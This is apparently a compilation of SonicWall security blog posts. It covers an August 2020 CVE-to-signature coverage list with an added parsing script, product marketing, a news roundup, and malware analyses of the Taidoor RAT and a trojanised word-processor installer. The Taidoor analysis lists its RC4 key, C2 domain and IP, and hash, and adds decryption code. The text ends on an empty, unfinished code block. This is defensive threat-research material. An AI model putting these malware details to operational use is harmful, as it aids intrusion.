Microsoft Security Bulletin Coverage for August 2020

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2020. The issues reported, along with SonicWall coverage information, are as follows:

CVE-2020-1380 Scripting Engine Memory Corruption Vulnerability
IPS 15107:Scripting Engine Memory Corruption Vulnerability (CVE-2020-1380)
IPS 15109:Scripting Engine Memory Corruption Vulnerability (CVE-2020-1380) 2

CVE-2020-1464 Windows Spoofing Vulnerability
ASPY 5983:Malformed-File msi.MP.1

CVE-2020-1472 Netlogon Elevation of Privilege Vulnerability
IPS 15143:Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)

CVE-2020-1480 Windows GDI Elevation of Privilege Vulnerability
IPS 2282:BAD-FILES: Suspicious Executable File Download 9

CVE-2020-1529 Windows GDI Elevation of Privilege Vulnerability
ASPY 5982:Malformed-File exe.MP.150

CVE-2020-1566 Windows Kernel Elevation of Privilege Vulnerability
ASPY 5452:Malformed-File exe.MP.64

CVE-2020-1567 MSHTML Engine Remote Code Execution Vulnerability
IPS 15105:MSHTML Engine Remote Code Execution (CVE-2020-1567)

CVE-2020-1570 Scripting Engine Memory Corruption Vulnerability
IPS 15106:Scripting Engine Memory Corruption Vulnerability (CVE-2020-1570)

CVE-2020-1578 Windows Kernel Information Disclosure Vulnerability
ASPY 5981:Malformed-File exe.MP.152

CVE-2020-1584 Windows dnsrslvr.dll Elevation of Privilege Vulnerability
ASPY 5980:Malformed-File exe.MP.151

CVE-2020-1587 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
ASPY 5979:Malformed-File exe.MP.153

Adobe Coverage:

CVE-2020-9697 Acrobat Reader Disclosure of Sensitive Data
ASPY 5984:Malformed-File pdf.MP.334

CVE-2020-9693 Acrobat Reader Arbitrary Code Execution
ASPY 5985:Malformed-File pdf.MP.335

The following vulnerabilities have no known exploits in the wild:

CVE-2020-0604 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1046 .NET Framework Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1337 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1339 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1377 Windows Registry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1378 Windows Registry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1379 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1383 Windows RRAS Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1417 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1455 Microsoft SQL Server Management Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1459 Windows ARM Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1466 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1467 Windows Hard Link Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1470 Windows Work Folders Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.

CVE-2020-1473 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1474 Windows Image Acquisition Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1475 Windows Server Resource Management Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1476 ASP.NET and .NET Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1477 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1478 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1479 DirectX Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1483 Microsoft Outlook Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1484 Windows Work Folders Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1485 Windows Image Acquisition Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1486 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1487 Media Foundation Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1488 Windows AppX Deployment Extensions Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1489 Windows CSC Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1490 Windows Storage Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1492 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1493 Microsoft Outlook Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1494 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1495 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1496 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1497 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1498 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1499 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1500 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1501 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1502 Microsoft Word Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1503 Microsoft Word Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1504 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1505 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1509 Local Security Authority Subsystem Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1510 Win32k Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1511 Connected User Experiences and Telemetry Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1512 Windows State Repository Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1513 Windows CSC Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1515 Windows Telephony Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1516 Windows Work Folders Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1517 Windows File Server Resource Management Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1518 Windows File Server Resource Management Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1519 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1520 Windows Font Driver Host Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1521 Windows Speech Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1522 Windows Speech Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1524 Windows Speech Shell Components Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1525 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1526 Windows Network Connection Broker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1527 Windows Custom Protocol Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1528 Windows Radio Manager API Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1530 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1531 Windows Accounts Control Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1533 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1534 Windows Backup Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1535 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1536 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1537 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1538 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1539 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1540 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1541 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1542 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1543 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1544 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1545 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1546 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1547 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1548 Windows WaasMedic Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1549 Windows CDP User Components Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1550 Windows CDP User Components Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1551 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1552 Windows Work Folder Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1553 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1554 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1555 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1556 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1557 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1558 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1560 Microsoft Windows Codecs Library Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1561 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1562 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1563 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1564 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1565 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1568 Microsoft Edge PDF Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1569 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1571 Windows Setup Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1573 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1574 Microsoft Windows Codecs Library Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1577 DirectWrite Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1579 Windows Function Discovery SSDP Provider Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1580 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1581 Microsoft Office Click-to-Run Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1582 Microsoft Access Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1583 Microsoft Word Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1585 Microsoft Windows Codecs Library Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1591 Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-1597 ASP.NET Core Denial of Service Vulnerability
There are no known exploits in the wild.
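The two lists above pair each CVE either with the SonicWall signature(s) that cover it or with a note that no in-the-wild exploit is known. A practitioner who wants to cross-check a month's bulletin against the signatures actually enabled on their own firewall needs that list in machine-readable form. The following Python is an added example, not SonicWall code: it parses the plain-text layout used on this page (a `CVE-YYYY-NNNN <title>` line followed by zero or more `IPS NNNN:<name>` / `ASPY NNNN:<name>` signature lines or the sentence "There are no known exploits in the wild."), lists the signature IDs per family, flags any CVE that has neither a signature nor the no-exploit note, and diffs the bulletin's IPS IDs against a set of enabled IDs. The `GAV` family in the regex and the `enabled_ips_ids` set are assumptions for illustration; the sample input is a constructed excerpt of the page's own entries plus one deliberately incomplete entry (`CVE-2020-0000`) to exercise the gap check.

```python
"""Parse a SonicWall monthly bulletin-coverage page into CVE -> signature data.

Added example (not SonicWall code). It assumes the plain-text layout used on
this page: a line "CVE-YYYY-NNNN <title>", followed by either signature lines
of the form "IPS 15143:<name>" / "ASPY 5983:<name>" or the sentence
"There are no known exploits in the wild." Headings and blank lines are skipped.
"""
import re
from dataclasses import dataclass, field

CVE_LINE = re.compile(r"^(CVE-\d{4}-\d{4,})\s+(.+?)\s*$")
# IPS and ASPY appear on this page; GAV is assumed here for months that list it.
SIG_LINE = re.compile(r"^(IPS|ASPY|GAV)\s+(\d+)\s*:\s*(.+?)\s*$")
NO_EXPLOIT = "There are no known exploits in the wild."

# Constructed sample: entries copied from this page, plus CVE-2020-0000, a
# made-up entry with neither a signature nor a note, to show the gap check.
SAMPLE = """\
CVE-2020-1380 Scripting Engine Memory Corruption Vulnerability
IPS 15107:Scripting Engine Memory Corruption Vulnerability (CVE-2020-1380)
IPS 15109:Scripting Engine Memory Corruption Vulnerability (CVE-2020-1380)2

CVE-2020-1464 Windows Spoofing Vulnerability
ASPY 5983:Malformed-File msi.MP.1

CVE-2020-1472 Netlogon Elevation of Privilege Vulnerability
IPS 15143:Windows Netlogon Elevation of Privilege Vulnerability(CVE-2020-1472)

Adobe Coverage:

CVE-2020-9697 Acrobat Reader Disclosure of Sensitive Data
ASPY 5984:Malformed-File pdf.MP.334

Following vulnerabilities do not have exploits in the wild :

CVE-2020-0604 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-0000 Constructed Entry With Neither Signature Nor Note
"""


@dataclass
class Entry:
    cve: str
    title: str
    signatures: list = field(default_factory=list)  # (family, id, name)
    no_known_exploits: bool = False


def parse_bulletin(text: str) -> list:
    """Return Entry objects in page order."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = CVE_LINE.match(line)
        if m:
            current = Entry(cve=m.group(1), title=m.group(2))
            entries.append(current)
            continue
        if current is None:
            continue  # intro text before the first CVE
        m = SIG_LINE.match(line)
        if m:
            current.signatures.append((m.group(1), int(m.group(2)), m.group(3)))
        elif line == NO_EXPLOIT:
            current.no_known_exploits = True
        # anything else (e.g. the "Adobe Coverage:" heading) is ignored
    return entries


def signature_ids(entries, family="IPS"):
    """Sorted, de-duplicated signature IDs of one family."""
    return sorted({sid for e in entries for fam, sid, _ in e.signatures if fam == family})


def unaccounted(entries):
    """CVEs with neither a signature nor a no-known-exploit note: follow these up."""
    return [e.cve for e in entries if not e.signatures and not e.no_known_exploits]


def missing_on_firewall(entries, enabled_ips_ids):
    """IPS signatures the bulletin relies on that are absent from the enabled set."""
    enabled = set(enabled_ips_ids)
    return [sid for sid in signature_ids(entries, "IPS") if sid not in enabled]


if __name__ == "__main__":
    parsed = parse_bulletin(SAMPLE)
    for e in parsed:
        print(e.cve, [sid for _, sid, _ in e.signatures], "no-exploit-note" if e.no_known_exploits else "")
    print("IPS IDs:", signature_ids(parsed))
    print("Unaccounted:", unaccounted(parsed))
    # enabled_ips_ids is an assumed set standing in for an export from the firewall
    print("Not enabled:", missing_on_firewall(parsed, {15107, 15143}))
```

Feed it the text of the whole bulletin and export the IPS signature list from the firewall; the output of `missing_on_firewall` is the list of signatures to turn on (or to confirm are covered by another rule) before treating this month's advisories as mitigated at the perimeter.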

New SonicWall SonicOSX 7.0 and SonicOS 7.0 Operating Systems Offer Visibility and Simplicity

Businesses are embracing digital transformation, bringing about a new era of the anytime, anywhere business. Staffed by flexible employees and built on the principle of a distributed enterprise, the resulting proliferation of applications and data presents organizations with a major security challenge.

As enterprises grow, they must proactively manage security across several different locations: at headquarters, at software-defined branches (SD-Branches), at co-located data centers or in a variety of cloud locations. These locations are not siloed — applications and data move dynamically between them, forcing security to follow.

SonicWall physical and virtual firewalls provide high-performance security across a wide range of enterprises, but protecting all these security vectors requires the ability to consistently apply the right security policy to the right network control point — while keeping in mind that some security failures can be attributed to ineffective policies or misconfigurations.

To ensure effective policy provisioning, enterprises need dynamic visibility across the network. They need a boundless approach to network security policy management.

The SonicOS or SonicOSX architecture is at the core of every SonicWall physical and virtual firewall, including the TZ, NSa, NSv and NSsp Series. Our operating systems leverage our patented, single-pass, low-latency, Reassembly-Free Deep Packet Inspection® (RFDPI) and patent-pending Real-Time Deep Memory Inspection™ (RTDMI) technologies to deliver industry-validated high security effectiveness, Secure SD-WAN, real-time visualization, high-speed virtual private networking (VPN) and other robust security features.

The latest TZ570/670 Series firewalls run on the brand-new SonicOS 7.0, which features advanced security, simplified policy management, and critical networking and management capabilities — all designed to meet the needs of distributed enterprises with next-gen SD-Branches and small- to medium-sized businesses.

With the introduction of the brand-new SonicOSX 7.0 and SonicOS 7.0, the SonicOS operating system is setting a new standard for usability. Built from the ground up, SonicOSX 7.0 architecture features Unified Policy management, which offers integrated management of various security policies for enterprise-grade firewalls such as SonicWall NSsp and NSv firewall series.

This OS upgrade brings about multi-instance support on NSsp series firewalls. Multi-instance is the next generation of multi-tenancy, where each tenant is isolated with dedicated compute resources to avoid resource starvation.

SonicOSX 7.0 also provides Unified Policy to provision L3 to L7 controls in a single rule base on every firewall, giving admins a centralized location for configuring policies. It comes with a new web interface born from a radically different approach: a user-first design emphasis. The SonicOSX web-based interface presents meaningful visualizations of threat information and displays actionable alerts that prompt you to configure contextual security policies with point-and-click simplicity.

In addition to being more user friendly, the new interface is also more attractive than the classic version. In a single-pane view of a firewall, the interface presents the user with information on the effectiveness of the various security rules. The user can then modify the predefined rules for gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering and deep-packet inspection of encrypted traffic in a seamless fashion.

Unified Policy gives your organization the ability to control dynamic traffic passing through a firewall and provides visibility and insight into the disparate policies that govern gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering, deep-packet inspection of encrypted traffic and more. It simplifies management tasks, reduces configuration errors and speeds up deployment time, all of which contribute to a better overall security posture.

To learn more, visit www.sonicwall.com/sonicos

New SonicWall Solutions Deliver Security, Simplicity and Value

It’s been talked about for years: Remote work is the future. The new office is wherever you are. The era of mobile employees will bring new levels of productivity, agility and worker satisfaction.

But no one predicted that the remote-work revolution would arrive all at once — or that it would be mandatory. In the midst of the pandemic, adopting work-from-home policies helped ensure both employee safety and business continuity. But the massive new cohort of unprepared remote and mobile workers brought with it unprecedented cybersecurity risks.

While something as fundamental as the way the world does work may have changed forever, the ideals of Boundless Cybersecurity are more relevant than ever. Organizations need to protect against the explosion of exposure points and risks from remote and mobile workforces.

They need the ability to stop known and unknown cyberattacks targeting any vulnerability in this new business normal. And they need to secure and rearchitect massively distributed networks in preparation for a future significantly changed.

As the IT world turns to face these challenges head on, SonicWall is stepping up its commitment to Boundless Cybersecurity.

The future of SonicWall Boundless Cybersecurity is focused on simplifying the security experience. We are delivering that in four key ways:

  • Provide an innovative user experience, streamline network security controls and deliver whole-network visibility with a modern, intuitive and easy-to-understand interface
  • Simplify the security experience for distributed enterprises and government agencies with a more approachable, flexible and easy-to-implement platform
  • Deliver more ways for organizations to increase visibility and maintain data control while identifying and stopping the known and unknown cyberattacks persistent in today’s new business normal
  • Redefine security administration so it’s easier and more accessible with new zero-touch-enabled, multi-gigabit TZ firewalls, secure SD-Branch capabilities and a redesigned, cloud-native management console

Today, we announce one of the most monumental product launches in the history of our company. In all, this effort includes a reimagined operating system and five new products or solution enhancements to the Capture Cloud Platform:

  • SonicOS 7.0 — Streamlines the security experience with a highly intuitive interface, ensuring familiarity, reducing training and slashing deployment times. The redesigned UI/UX balances convenience and control, offering device dashboards, redesigned topologies, SonicExpress mobile app support, and simplified policy creation and management.
  • SonicOSX 7.0 — Empowers governments and distributed enterprises with greater levels of scalability, protection and control. The enhanced OS simplifies policy, auditing and management — offering greater levels of visibility with a UI/UX designed for distributed enterprises and governments.
  • SonicWall Network Security Manager (NSM) 2.0 SaaS — Offers unprecedented speed, scalability and reliability for comprehensive firewall management across the largest distributed enterprises. The cloud-native NSM enables organizations to optimize, control, monitor and manage tens of thousands of network security devices — including firewalls, managed switches and secure wireless access points — from anywhere via a simple cloud interface.
  • SonicWall NSsp 15700 — Offers multiple 100/40/10 GbE interfaces, revolutionary multi-instance capabilities and high-speed threat analysis, enabling organizations to safeguard millions of connections without compromising security. Designed for enterprises, governments, data centers and service providers, these high-end firewalls future-proof your investment by allowing you to scale security to meet dynamic connection requirements as the number of devices and users continues to grow.
  • SonicWall CSa 1000 — Brings SonicWall’s award-winning Capture ATP service on-prem, giving government, healthcare and other organizations subject to compliance or data residency restrictions the same protection currently offered in the cloud. Enhanced with Real-Time Deep Memory Inspection™ (RTDMI), CSa 1000 analyzes a broad range of file types, detecting and blocking zero-day exploits, suspicious files and even side-channel attacks such as Meltdown, Spectre, Foreshadow, PortSmash, Spoiler, MDS and TPM-Fail.
  • SonicWall TZ570 & TZ670 — Represents the first desktop firewall form factor to offer multi-gigabit (5/10G) interfaces for connectivity with SonicWall Switches or other networking devices in SD-Branch deployments — all with threat prevention speeds up to 2.5 Gbps. These next-generation firewalls feature integrated secure SD-WAN, Zero-Touch Deployment, TLS 1.3 and 5G support, and more innovative features that reduce costs and save time.

SonicWall’s commitment has always been to help protect SMBs, enterprises and government agencies worldwide. And now, it’s never been easier to realize true cybersecurity by breaking free from the constraints of the past. To learn more about SonicWall’s new products and enhancements, review our press release, contact a SonicWall security expert, or check back over the coming days as our security experts offer a closer look into each major new product.

SonicWall is Boundless Cybersecurity for the hyper-distributed era.

Cybersecurity News & Trends – 08-07-20

This week, hackers dominated the headlines. But from financial firms, to voting machines, to entire countries, many are beginning to mount a stronger defense.


SonicWall Spotlight

AT&T Cybersecurity: Do Secure VPNs, Don’t Pay Ransoms — SDxCentral

  • The author notes that, per SonicWall’s mid-year update to the 2020 Cyber Threat Report, there was a 20% jump in ransomware globally in the first half of 2020 compared to mid-year 2019, including a staggering 109% spike in the U.S.

3 Tips For Improving Your Cybersecurity Program This School Year — EdTech Magazine

  • As schools prepare to reopen, EdTech Magazine offers three ways districts can improve their cybersecurity programs.

Covid-19 pandemic: Russian hackers target UK, US and Canadian research — Pharmaceutical Technology

  • Security services in the UK, US and Canada have determined that the Russian hacking group APT29 has attempted to illicitly access Covid-19 research. SonicWall CEO Bill Conner discusses how state-sponsored espionage groups are targeting medical data.

Cybersecurity News

Insecure satellite Internet is threatening ship and plane safety — Ars Technica

  • At the Black Hat security conference, researcher James Pavur presented findings that show that satellite-based Internet is putting millions at risk despite safeguards implemented by providers.

How the US Can Prevent the Next ‘Cyber 9/11’ — Wired

  • In an interview with WIRED, former national intelligence official Sue Gordon discusses Russian election interference and other digital threats to democracy.

U.S. Government Launches Cyber Career Path Tool — Security Week

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week announced the launch of a free tool designed to help users identify and navigate a potential career path.

U.S. coronavirus fraud losses near $100 million as COVID scams double — Reuters

  • U.S. losses from coronavirus-related fraud and identity theft have reached nearly $100 million, while complaints of COVID-19 scams have at least doubled in most states.

Financial Firms’ Cybersecurity Spending Jumps 15%, Survey Finds — Bloomberg

  • Big banks and other financial firms are spending 15% more this year to defend computer networks from cyber criminals, and the pandemic and work-from-home arrangements are probably spurring further increases.

Hackers Get Green Light to Test U.S. Voting Systems — The Wall Street Journal

  • Election Systems & Software, the top U.S. seller of voting-machine technology, is calling a truce in its feud with computer security researchers over the ways they probe for vulnerabilities of the company’s systems.

Hackers can abuse Microsoft Teams updater to install malware — Bleeping Computer

  • Microsoft Teams can still double as a Living off the Land binary (LoLBin) and help attackers retrieve and execute malware from a remote location.

Robots Running the Industrial World Are Open to Cyber Attacks — Bloomberg

  • According to a new report titled “Rogue Automation,” some robots have flaws that could make them vulnerable to advanced hackers, who could steal data or alter a robot’s movements remotely.

Interpol Warns of ‘Alarming’ Cybercrime Rate During Pandemic — Security Week

  • Global police body Interpol has warned of an “alarming” rate of cybercrime during the coronavirus pandemic.

CISA, DOD, FBI expose new versions of Chinese malware strain named Taidoor — ZDNet

  • U.S. government agencies say the Taidoor remote access trojan (RAT) has been used as far back as 2008.

Exclusive: China-backed hackers ‘targeted COVID-19 vaccine firm Moderna’ — Reuters

  • Chinese government-linked hackers targeted biotech company Moderna Inc., a U.S.-based coronavirus vaccine research developer, this year in a bid to steal data, according to a U.S. security official.

Hackers Are Targeting the Remote Workers Who Keep Your Lights On — Bloomberg

  • With many of the people who help keep the grid running now working from home, cyberattacks targeting the power sector have surged.

Hackers Broke Into Real News Sites to Plant Fake Stories — Wired

  • A disinformation operation broke into the content management systems of Eastern European media outlets in a campaign to spread misinformation about NATO.

In Case You Missed It

Chinese Remote Access Trojan Taidoor

Overview:

SonicWall Capture Labs Threat Research Team recently observed activity for the Chinese Remote Access Trojan Taidoor. Taidoor is composed of two stages: a loader and the RAT module. The loader starts the service and decrypts the second file. Initial infection goes through the loader’s exported function “MyStart”, which allocates memory for a new file called “svchost.dll”.

Before the new file is called, its contents go through a series of decryption routines. The DLL uses RC4; the key is rebuilt from the following string: “ar1zyAXt7d6556sAsvchUQc2”. Once filtered, the RC4 key is: “ar1z7d6556sAyAXtUQc2”.

The RC4 algorithm is also used to decrypt the import names and other related strings.
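The following is an added example (not code from the original post or from the Taidoor sample) showing RC4 decryption with the filtered key quoted above. The post does not describe the routine that turns the raw string into the filtered key, so the filtered key is taken as given; the blob of NUL-separated import names decrypted at the bottom is constructed here for illustration, and its layout is an assumption.

```python
"""RC4 decryption with the Taidoor loader key (added example, not the sample's code)."""

RAW_KEY_STRING = b"ar1zyAXt7d6556sAsvchUQc2"   # string found in the loader (from the write-up)
FILTERED_KEY = b"ar1z7d6556sAyAXtUQc2"         # key after the loader's filtering step (from the write-up)


def rc4_keystream(key):
    """Generator for the RC4 keystream: key scheduling (KSA) then output generation (PRGA)."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA: permute S using the key bytes
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:                                # PRGA: one keystream byte per iteration
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key, data):
    """RC4 is a stream cipher, so the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


def decrypt_cstrings(key, blob):
    """Decrypt a blob of NUL-terminated strings (e.g. import names) and split it into a list.

    The NUL-separated layout is an assumption for this example, not a fact from the write-up.
    """
    clear = rc4(key, blob)
    return [s.decode("ascii", "replace") for s in clear.split(b"\x00") if s]


if __name__ == "__main__":
    # Constructed sample: encrypt a few import names with the Taidoor key so there is
    # something to decrypt; in practice the blob would be carved from the loader.
    names = b"LoadLibraryA\x00GetProcAddress\x00VirtualAlloc\x00"
    encrypted = rc4(FILTERED_KEY, names)
    print(decrypt_cstrings(FILTERED_KEY, encrypted))
```

Because RC4 has no integrity check, a wrong key silently yields garbage; sanity-check a candidate key by looking for printable ASCII and known API names in the output, as the last function does implicitly.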

DLL Loader Layer, Static Information:

Checking binary static information… (Not Corrupted)…

PDB:

Exports:

DllMain:

RC4 Prefiltered Key:

Dynamic Information:

Looking inside “MyStart” Export Routine:

Creating the RAT module:

Once svchost.dll is allocated in memory, the loader cycles through its exports and locates the “Start” export routine in the new DLL.

Calling the “Start” routine to start the Remote Access Trojan module:

Network Artifacts:

Command and Control Information:

  • cnaweb.mrslove.com
  • 210.68.69.82

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall Gateway Anti-Virus (GAV) provides protection against this threat:

  • GAV: Taidoor.LD

Appendix:

Sample SHA256 Hash: 4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4

Fake Chinese Word Processing App installs an Infostealer Trojan

The SonicWall Capture Labs Research team has come across a Chinese word processor that comes packaged with an infostealer. The word processor is distributed as a Nullsoft (NSIS) installer and appears to be a legitimate alternative to Notepad or Word.

Infection Cycle:

This Trojan comes as an NSIS installer and uses the following icon:

Upon execution, it guides the user through typical software installation prompts and then launches the word-processing app window.

However, upon further inspection, it appears that it launched the word processing app alongside another copy of AllRoundPad.exe.

Simultaneously, several connections to remote servers were made.

This Trojan accesses personal information including browsing history, the user’s IP address and location, among others. It also attempts to access and modify the system’s Internet settings.

It creates .tmp files in the %temp% directory with information gathered regarding the victim’s machine. These are then later sent out to a remote server.

This installation comes with an uninstaller. However, using the uninstaller only removes the word-processing app and leaves behind a copy of the Trojan in the %temp% directory, which is responsible for all the malicious behavior observed.
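The leftover copy in %temp% is the check a responder would want to run. Below is an added example (not code from the original post) that walks a directory and flags any file whose bytes are a PE image but whose name does not look like an executable, which catches a Trojan parked under a .tmp name. The sample directory, the file names in it and the minimal PE header are constructed here so the script runs anywhere; on a Windows host it reads the real %TEMP% instead.

```python
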